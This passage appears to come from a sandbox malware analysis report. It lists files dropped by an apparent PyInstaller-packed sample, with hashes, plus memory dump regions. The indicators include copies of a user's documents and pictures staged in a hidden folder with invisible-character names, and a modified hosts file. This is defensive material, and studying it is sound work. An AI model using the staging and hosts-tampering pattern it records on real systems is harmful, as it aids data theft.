                                                                                  a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe

                                                                                  Filesize

                                                                                  615KB

                                                                                  MD5

                                                                                  9c223575ae5b9544bc3d69ac6364f75e

                                                                                  SHA1

                                                                                  8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                  SHA256

                                                                                  90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                  SHA512

                                                                                  57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\rarreg.key

                                                                                  Filesize

                                                                                  467B

                                                                                  MD5

                                                                                  9795f79ddb61aa29027f4d68496b379c

                                                                                  SHA1

                                                                                  2b28db4d9ac8cffba73048444b1df25346f4ef32

                                                                                  SHA256

                                                                                  e63f3d6710097498085564dfc85add6ed4cf44238c33d20820d2426abcee4e31

                                                                                  SHA512

                                                                                  e44fbbc02da75d173c81bdfda9b14102997609af06fd50c51030430c3c80193dadb632592997361c79b0dfed50ccc0e1743c306a881401a1c78a6a7facb45d4d

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\select.pyd

                                                                                  Filesize

                                                                                  25KB

                                                                                  MD5

                                                                                  a71d12c3294b13688f4c2b4d0556abb8

                                                                                  SHA1

                                                                                  13a6b7f99495a4c8477aea5aecc183d18b78e2d4

                                                                                  SHA256

                                                                                  0f3ae1b65102d38f6b33fcbbdadd347aa1b0c09ed8028d4412982b3bd97caf0f

                                                                                  SHA512

                                                                                  ff16cb399b661c170bf79108c62010d32804ead3f6c565b0755a26b62b4f51290bcb71face6cebaa82c0f9b3863aaaa7fa57ddc1e2bbae8598b047d01d15cbe5

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\sqlite3.dll

                                                                                  Filesize

                                                                                  630KB

                                                                                  MD5

                                                                                  ce4f27e09044ec688edeaf5cb9a3e745

                                                                                  SHA1

                                                                                  b184178e8a8af7ac1cd735b8e4b8f45e74791ac9

                                                                                  SHA256

                                                                                  f940ff66960441c76a258846d66d4a357e72ad8fbb6bde62b5e5fbe90103b92d

                                                                                  SHA512

                                                                                  bab572324dcf12e71fb6a9648e9224528bd29c75e7d3b978b7068eca0d6f2cb795165756249f47e1db401267b0a1e5fd06c35b6cf5595a013240f9e3444ea083

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI18642\unicodedata.pyd

                                                                                  Filesize

                                                                                  295KB

                                                                                  MD5

                                                                                  9a03b477b937d8258ef335c9d0b3d4fa

                                                                                  SHA1

                                                                                  5f12a8a9902ea1dc9bbb36c88db27162aa4901a5

                                                                                  SHA256

                                                                                  4d6e035a366c6f74660f74b8b816add345fa7f1c6cf0793dcf1ed9f91b6ce6a4

                                                                                  SHA512

                                                                                  d3d8bb51474f93d02837580f53aacf5ca9eaf8587e83cddb742c707a251fe86f14e8e665aa4423ac99d74c6c94d95c7df3bfd513b3d5c69661e604f22dcabebe

                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4osf1b0.kcg.ps1

                                                                                  Filesize

  1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

• C:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.dll
  Filesize: 4KB
  MD5: 891fc590fd6a28aac348b7ad90677548
  SHA1: 59457ce97774e91fbf01c3ee955d8885a1b08691
  SHA256: 2da913f02b15a40e51b3ef2dd4ef0e92b3716d2091e3f73a8a38ca0e2593cf9c
  SHA512: dbba36c1d17100e913865c9ccb63e8a0b279e0b32bc04c9c6782e3260d6a975fc56e78a0266ea9d4c2b5b3278c35f3d6d8811eb6d33968df58e7e81aad70b081

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Desktop\LimitSearch.jpeg
  Filesize: 281KB
  MD5: 57118548eb471639de3a3083f84f9042
  SHA1: d3524a6cab11bd68f398737cf74f870cad6a3f26
  SHA256: 4ef0ceae18af96541c844cd0603db69f392916d64ded379059720a86300ac624
  SHA512: f3770060359cfd45523278a37d2b409eaf7e1cf82ebe47d2646e47b9df350f1cdf2bb829f54a798ee63ce6ef3949a803a761e068cb2d0d77e9fece4da4940baa

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Desktop\WaitSend.png
  Filesize: 318KB
  MD5: 8fee46f96d52bae3116031cd6d76ae08
  SHA1: 8da8eb65917f8adb7564042f6b07b8af4c7a47dd
  SHA256: 82523d27f08c72e09651ddf3572189febc0207dd4beb9fc0b44e37a8030f5589
  SHA512: 773451f4f12799a95a26fa83b801382894598a8d60d069d0eb4a8ee184469398a08d7006f2e8b2a83ce8a026bdf114ca81c4ec3502b269908de5a71320ccbdb6

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Are.docx
  Filesize: 11KB
  MD5: a33e5b189842c5867f46566bdbf7a095
  SHA1: e1c06359f6a76da90d19e8fd95e79c832edb3196
  SHA256: 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
  SHA512: f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Files.docx
  Filesize: 11KB
  MD5: 4a8fbd593a733fc669169d614021185b
  SHA1: 166e66575715d4c52bcb471c09bdbc5a9bb2f615
  SHA256: 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
  SHA512: 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Opened.docx
  Filesize: 11KB
  MD5: bfbc1a403197ac8cfc95638c2da2cf0e
  SHA1: 634658f4dd9747e87fa540f5ba47e218acfc8af2
  SHA256: 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
  SHA512: b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\Recently.docx
  Filesize: 11KB
  MD5: 3b068f508d40eb8258ff0b0592ca1f9c
  SHA1: 59ac025c3256e9c6c86165082974fe791ff9833a
  SHA256: 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
  SHA512: e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Documents\These.docx
  Filesize: 11KB
  MD5: 87cbab2a743fb7e0625cc332c9aac537
  SHA1: 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
  SHA256: 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
  SHA512: 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Downloads\BackupConvertTo.mpg
  Filesize: 345KB
  MD5: f7c643c1104c711ff797ee2b154969ac
  SHA1: f49746c762f5304f09113755146918125c8ad4a2
  SHA256: d61bf011d804951c8e57fb3f926ba938f4c940f982a2f36efa8fd7eb0f562dd2
  SHA512: 475efb861cf7a5898c13f3b8baf9131e0dc3e27599bf50331cb49f26ace2ee8dc39ce487a54533442b42c8d28ca1e3123ac4e21103c3d5d582459d7d0eeb90d2

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Downloads\BackupSet.ocx
  Filesize: 251KB
  MD5: d6759dcf8302c1632a0225f5180437f9
  SHA1: 1884ff2292b797cc1f2006e6086e52304e7efdb1
  SHA256: 0c4c48c7595e9baebfd548ebe84162a6793b2e14ad1c371736707f988f765cf0
  SHA512: 331b7a844c6134b115211e77fca56bb6ef6e1be61b1cc70e94f4bfd951c74142887ad8e58c917f0d202349ed2e561c8a0786c3447e25b92ba2293078bdd5a5c3

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Downloads\GrantDisable.csv
  Filesize: 392KB
  MD5: 489f56a8785203d69e74dbf7f9e17baf
  SHA1: 5ef72ec5dc744d60b49718d777f9892e84825b7b
  SHA256: 75b468c2601df759849644f5419144d87bfefdefb92ba2f0501714aab1fa9ded
  SHA512: 4cd2575ed926073be058da1d32d2feba74ecad8efdc78d13cbc20e1783d19a0b3b8856c259a36e5839eb53cc8959f9e6f8c6970b1d36b506f2fca94e927dc258

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Pictures\My Wallpaper.jpg
  Filesize: 24KB
  MD5: a51464e41d75b2aa2b00ca31ea2ce7eb
  SHA1: 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
  SHA256: 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
  SHA512: b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

• C:\Users\Admin\AppData\Local\Temp\‌​ ‌‎     \Common Files\Pictures\PublishMove.jpg
  Filesize: 864KB
  MD5: 42b7f6d7249b85a0162f99831db70ab8
  SHA1: 3e8da95e3d8b94917a201be97b44d2ed42a3ed44
  SHA256: f4c2004120200015254369ec5dc1c6c030c5f622ffded855d7a1cd8f52717263
  SHA512: 3918431dc18209de7839e8f15eafca58d64f4202a76fde847d159c58dbda367df8c7a9bec35cc87542cd4ada235535b2e80142ad1df9b541860ca60128f6275a

• C:\Windows\System32\drivers\etc\hosts
  Filesize: 2KB
  MD5: d5371674f26f144bf68f800bb3b80d5a
  SHA1: a5ae4e82a6ba9118e28b767d3522c6a3fb0ee582
  SHA256: f2ca2cbdec30ce8730436e1bed3c166e005e4742c6a8c931e50e873cdc8ebb03
  SHA512: 21e068860c0671e54bfd4862735a51d0dc790a737b3f9835f64dafcdb2c0d50bf49b8027d6c43c79ebabf2ac7dcd6be084c613e711fab92a54bb3cfefcb7fb3f

• \??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\CSCBD0D024427384C299BA7C176B2D0357A.TMP
  Filesize: 652B
  MD5: 02c06cbbada24b30a44fd7995a7464e8
  SHA1: e3ba4c526c1f23709f306132f4bebf5cb15ca7b1
  SHA256: cd751c8a045051c5eddb4eebbe193e61c58cff237d9d95a816d33b938f6391bb
  SHA512: 4d0925b426371fc5d7d252fa51ca21d9a9f03e12be88fea2f0e43cdd57af7465c412c09be67e098cc429f564cb08f27d25f90046205e6269054a828062cac5b4

• \??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.0.cs
  Filesize: 1004B
  MD5: c76055a0388b713a1eabe16130684dc3
  SHA1: ee11e84cf41d8a43340f7102e17660072906c402
  SHA256: 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
  SHA512: 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

• \??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.cmdline
  Filesize: 607B
  MD5: 192543784977d2de821d4922412027e7
  SHA1: 280123ca01384d7e6c12ed094dc8d99b1f96e501
  SHA256: 0e38c737041d09234e7056aaf3e19a9cece5c95616f10eef38eded57c99b4732
  SHA512: 9a1260b005cbc0298a902b0f766c0ed0ce07ba9fc38cb6246f15784e66aa5a465a05ed5f8e600487865c1457bf45f2c7097e4d592f0e831d88e2335c18a7f350

• memory/836-105-0x000002B779940000-0x000002B7799B6000-memory.dmp
  Filesize: 472KB

• memory/836-92-0x00007FFEF0813000-0x00007FFEF0814000-memory.dmp
  Filesize: 4KB

• memory/836-102-0x000002B779830000-0x000002B779932000-memory.dmp
  Filesize: 1.0MB

• memory/836-99-0x00007FFEF0810000-0x00007FFEF11FC000-memory.dmp
  Filesize: 9.9MB

• memory/836-93-0x000002B779590000-0x000002B77961A000-memory.dmp
  Filesize: 552KB

• memory/836-199-0x00007FFEF0810000-0x00007FFEF11FC000-memory.dmp
  Filesize: 9.9MB

• memory/836-94-0x000002B75F6B0000-0x000002B75F6C0000-memory.dmp
  Filesize: 64KB

• memory/1424-101-0x000001D96A0F0000-0x000001D96A112000-memory.dmp
  Filesize: 136KB

• memory/1424-132-0x000001D96A630000-0x000001D96A67C000-memory.dmp
  Filesize: 304KB

• memory/1424-193-0x000001D96A550000-0x000001D96A570000-memory.dmp
  Filesize: 128KB

• memory/3924-73-0x00007FFF00E70000-0x00007FFF00F3D000-memory.dmp
  Filesize: 820KB

• memory/3924-66-0x00007FFF04DF0000-0x00007FFF04E09000-memory.dmp
  Filesize: 100KB

• memory/3924-90-0x00007FFF04560000-0x00007FFF04584000-memory.dmp
  Filesize: 144KB

• memory/3924-80-0x00007FFF04500000-0x00007FFF04514000-memory.dmp
  Filesize: 80KB

• memory/3924-83-0x00007FFF047F0000-0x00007FFF047FD000-memory.dmp
  Filesize: 52KB

• memory/3924-85-0x00007FFF04ED0000-0x00007FFF04EE9000-memory.dmp
  Filesize: 100KB

• memory/3924-86-0x00007FFEFFD20000-0x00007FFEFFE3B000-memory.dmp
  Filesize: 1.1MB

• memory/3924-82-0x00007FFF04590000-0x00007FFF045BD000-memory.dmp
  Filesize: 180KB

• memory/3924-553-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
  Filesize: 148KB

• memory/3924-78-0x00007FFF00940000-0x00007FFF00E69000-memory.dmp
  Filesize: 5.2MB

• memory/3924-77-0x0000019095D10000-0x0000019096239000-memory.dmp
  Filesize: 5.2MB

• memory/3924-416-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp
  Filesize: 1.5MB

• memory/3924-424-0x00007FFEFFD20000-0x00007FFEFFE3B000-memory.dmp
  Filesize: 1.1MB

• memory/3924-421-0x00007FFF00940000-0x00007FFF00E69000-memory.dmp
  Filesize: 5.2MB

• memory/3924-420-0x00007FFF00E70000-0x00007FFF00F3D000-memory.dmp
  Filesize: 820KB

• memory/3924-419-0x00007FFF04520000-0x00007FFF04553000-memory.dmp
  Filesize: 204KB

• memory/3924-410-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp
  Filesize: 6.8MB

• memory/3924-411-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
  Filesize: 148KB

• memory/3924-76-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
  Filesize: 148KB

• memory/3924-100-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp
  Filesize: 1.5MB

• memory/3924-72-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp
  Filesize: 6.8MB

• memory/3924-70-0x00007FFF04520000-0x00007FFF04553000-memory.dmp
  Filesize: 204KB

• memory/3924-68-0x00007FFF04800000-0x00007FFF0480D000-memory.dmp
  Filesize: 52KB

• memory/3924-243-0x00007FFF04DF0000-0x00007FFF04E09000-memory.dmp
  Filesize: 100KB

• memory/3924-64-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp
  Filesize: 1.5MB

• memory/3924-62-0x00007FFF04560000-0x00007FFF04584000-memory.dmp
  Filesize: 144KB

• memory/3924-60-0x00007FFF04ED0000-0x00007FFF04EE9000-memory.dmp
  Filesize: 100KB

• memory/3924-58-0x00007FFF04590000-0x00007FFF045BD000-memory.dmp
  Filesize: 180KB

• memory/3924-36-0x00007FFF065B0000-0x00007FFF065BF000-memory.dmp
  Filesize: 60KB

• memory/3924-33-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
  Filesize:

                                                                                  148KB

                                                                                • memory/3924-29-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp

                                                                                  Filesize

                                                                                  6.8MB

                                                                                • memory/3924-496-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp

                                                                                  Filesize

                                                                                  6.8MB

                                                                                • memory/3924-513-0x0000019095D10000-0x0000019096239000-memory.dmp

                                                                                  Filesize

                                                                                  5.2MB

                                                                                • memory/3924-566-0x00007FFEFFD20000-0x00007FFEFFE3B000-memory.dmp

                                                                                  Filesize

                                                                                  1.1MB

                                                                                • memory/3924-563-0x00007FFF00940000-0x00007FFF00E69000-memory.dmp

                                                                                  Filesize

                                                                                  5.2MB

                                                                                • memory/3924-552-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp

                                                                                  Filesize

                                                                                  6.8MB

                                                                                • memory/3924-562-0x00007FFF00E70000-0x00007FFF00F3D000-memory.dmp

                                                                                  Filesize

                                                                                  820KB

                                                                                • memory/3924-561-0x00007FFF04520000-0x00007FFF04553000-memory.dmp

                                                                                  Filesize

                                                                                  204KB

                                                                                • memory/3924-560-0x00007FFF04800000-0x00007FFF0480D000-memory.dmp

                                                                                  Filesize

                                                                                  52KB

                                                                                • memory/3924-559-0x00007FFF04DF0000-0x00007FFF04E09000-memory.dmp

                                                                                  Filesize

                                                                                  100KB

                                                                                • memory/3924-558-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp

                                                                                  Filesize

                                                                                  1.5MB

                                                                                • memory/3924-557-0x00007FFF04560000-0x00007FFF04584000-memory.dmp

                                                                                  Filesize

                                                                                  144KB

                                                                                • memory/3924-556-0x00007FFF04ED0000-0x00007FFF04EE9000-memory.dmp

                                                                                  Filesize

                                                                                  100KB

                                                                                • memory/3924-555-0x00007FFF04590000-0x00007FFF045BD000-memory.dmp

                                                                                  Filesize

                                                                                  180KB

                                                                                • memory/3924-554-0x00007FFF065B0000-0x00007FFF065BF000-memory.dmp

                                                                                  Filesize

                                                                                  60KB

                                                                                • memory/3924-565-0x00007FFF047F0000-0x00007FFF047FD000-memory.dmp

                                                                                  Filesize

                                                                                  52KB

                                                                                • memory/3924-564-0x00007FFF04500000-0x00007FFF04514000-memory.dmp

                                                                                  Filesize

                                                                                  80KB

                                                                                • memory/4172-379-0x0000017427D80000-0x0000017427D88000-memory.dmp

                                                                                  Filesize

                                                                                  32KB